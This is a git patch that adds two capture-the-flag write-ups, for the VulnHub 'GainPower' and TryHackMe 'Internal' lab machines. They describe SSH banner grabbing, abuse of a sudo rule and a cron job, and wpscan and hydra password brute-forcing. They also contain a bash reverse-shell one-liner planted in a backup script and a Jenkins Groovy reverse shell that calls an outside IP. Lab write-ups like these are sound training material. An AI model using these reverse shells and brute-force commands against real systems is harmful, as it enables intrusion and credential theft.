From e4fc0fb4bfe493659a6e5c8b175080f3888383c1 Mon Sep 17 00:00:00 2001 From: 205101-ascharan <57037826+205101-retr0@users.noreply.github.com> Date: Sat, 2 Oct 2021 01:33:24 +0530 Subject: [PATCH 1/2] added new writeup --- vulnhub/GainPower_01.md | 78 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 vulnhub/GainPower_01.md diff --git a/vulnhub/GainPower_01.md b/vulnhub/GainPower_01.md new file mode 100644 index 0000000..67f58dd --- /dev/null +++ b/vulnhub/GainPower_01.md @@ -0,0 +1,78 @@ +This one's a little messed up. There are 2 flags here user and root. + +Doing a nmap scan we see there are 3 ports http/80, http/8000, ssh/22. + +Now we can try to scan http/80 for something but that will give us nothing. It is on big rabbit hole. But http/8000 is ajenti login portal. + +There is no way of enumerating users and passwords here so we have to exploit this using ssh port. + +This requires something called banner grabbing. For that we can just try and login as any user. + +__ssh target_ip__ --> Here in the banner we see username format for different users. + +``` +Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) + + ___ _ ___ + / __|__ _(_)_ _ | _ \_____ __ _____ _ _ + | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| + \___\__,_|_|_||_| |_| \___/\_/\_/\___|_| + + +I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;) + +I already told the format of password of everyone in the yesterday's metting. + +Now i have configured everything. My request is to everyone to Complete assignments on time + +btw one of my employee have sudo powers because he is my favourite + +NOTE : "This message will automatically removed after 2 days" + - BOSS +``` +We try logging using employee1:employee1. And we're in. So probably all users have username as their password. + +Also the line _one of my employee have sudo powers because he is my favourite_ is interesting. + +We can write a script to login as employees and run the command __sudo -l__ and scout the output. + +After running the script for sometime we get that employee64 can run sudo commands as user programmer. + +Logging in as him still we can't find anything significant in all his directories. So we download __pspy64__ onto the server and run that to see if there are any cronjobs running in the background. + +We see that there is a script running in the background in programmer dir. So we need to login as him to access it to change it. + +__sudo -u programmer /usr/bin/unshare__ --> Now we are logged as programmer so we can change the script running in the background. + +``` +2020/12/17 10:12:02 CMD: UID=1183 PID=3796 | /bin/bash /media/programmer/scripts/backup.sh +``` +We see that this script runs as UID=1183 which is not the UID of programmer. We can find out who it is by running a simple command. + +__cat /etc/passwd | grep -e "UID=1183"__ + +We see that user 1183 is vanshal. so we can get a shell as vanshal if we add a bash reverse shell script to the backup.sh file and listen on another port. + +__bash -i >& /dev/tcp/host_ip/port 0>&1__ --> added in backup.sh + +Note: we can't use nano because it's not on this machine we have to use vim editor. + +___After we get a shell we got the FIRST FLAG in local.txt.___ + +We can run python2 on this so let's start a http server and download the secret.zip file onto our system. + +__python -m SimpleHTTPServer 4445__ --> Port number can be anything that's not already in use by the system. + +After downloading the file we can [crack the password using john the ripper](https://dfir.science/2014/07/how-to-cracking-zip-and-rar-protected.html). + +We find that __password to zip file is 81237900__. Opening that we get a very secure password in Mypassword.txt file. + +This might be the password for that ajenti login running on port 8000. And yes, it is. + +__root: contents of Mypasswords.txt__ + +Now here on the website we see a tab saying terminal. Going to it we see we have a root terminal shell. + +___We can change into the root directory and read the PROOF.TXT which is the ROOT FLAG.___ + +And That's it. \ No newline at end of file From 5fb575907724daff5557b65016ab64c8e79b9568 Mon Sep 17 00:00:00 2001 From: 205101-ascharan <57037826+205101-retr0@users.noreply.github.com> Date: Sat, 2 Oct 2021 01:34:46 +0530 Subject: [PATCH 2/2] Windows machine writeup --- vulnhub/Internal.md | 67 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 vulnhub/Internal.md diff --git a/vulnhub/Internal.md b/vulnhub/Internal.md new file mode 100644 index 0000000..d267424 --- /dev/null +++ b/vulnhub/Internal.md @@ -0,0 +1,67 @@ +tryhackme box (Hard) + +## Recon +did an nmap scan on the target to get the output as 2 open ports. + +open_ports: http(80) and ssh(22) + +gobuster scan on the target on port 80 revealed a wordpress site on the url `/blog`. So I added the ip to hosts and reloaded the site. + +In the meantime enumerate for users using wpscan. + +## Enumeration +`wpscan --url HOST-IP/blog --enumerate` + +The enumeration for the users only gave up 1 username i.e. `admin` + +Running a brute-force with wpscan on the target with username `admin` we get the password. + +`wpscan --url HOST-IP/blog --usernames admin --passwords rockyou.txt` + +Starting from brute-force on wordpress site. + +It found a match. +`admin : my2boys` --> wordpress + +## Exploiting jenkins +Uploaded a reverse shell to themes and trigger a reverse shell. + +Got reverse shell and did alot of snooping around even the linpeas.sh didn't work. So, I looked at a writeup to find a hidden file in `/opt`. + +That file gave a password to the user aubreanna. I log into that and there was note in there that said: + +`Internal Jenkins service is running on 172.17.0.2:8080` + +We port forward everything going here to our local machine. + +`ssh -L 1234:localhost:8080 aubreanna@internal.thm` + +I can open a jenkins site now on the localhost:1234. +brute-forcing the password to this jenkins site using hydra. + +`hydra -l admin -P rockyou.txt -u localhost -s 1234 http-get` + +We get the creds for that +`admin : spongebob` --> jenkins + +## Getting the root shell +After snooping around there, I goto `run script` under `manage jenkins` tab. +There I ran a script to get a `java reverse shell` running. + +` +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.14.13.156/9999;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +` + +I wasn't finding anything like config files. So I ran a search for txt files. + +`find -name *.txt 2>/dev/null` + +I find a `note.txt` in the directory `/opt`. + +In the note was password to the root account. + +`root : tr0ub13guM!@#123` + +Now we can get both the flags. \ No newline at end of file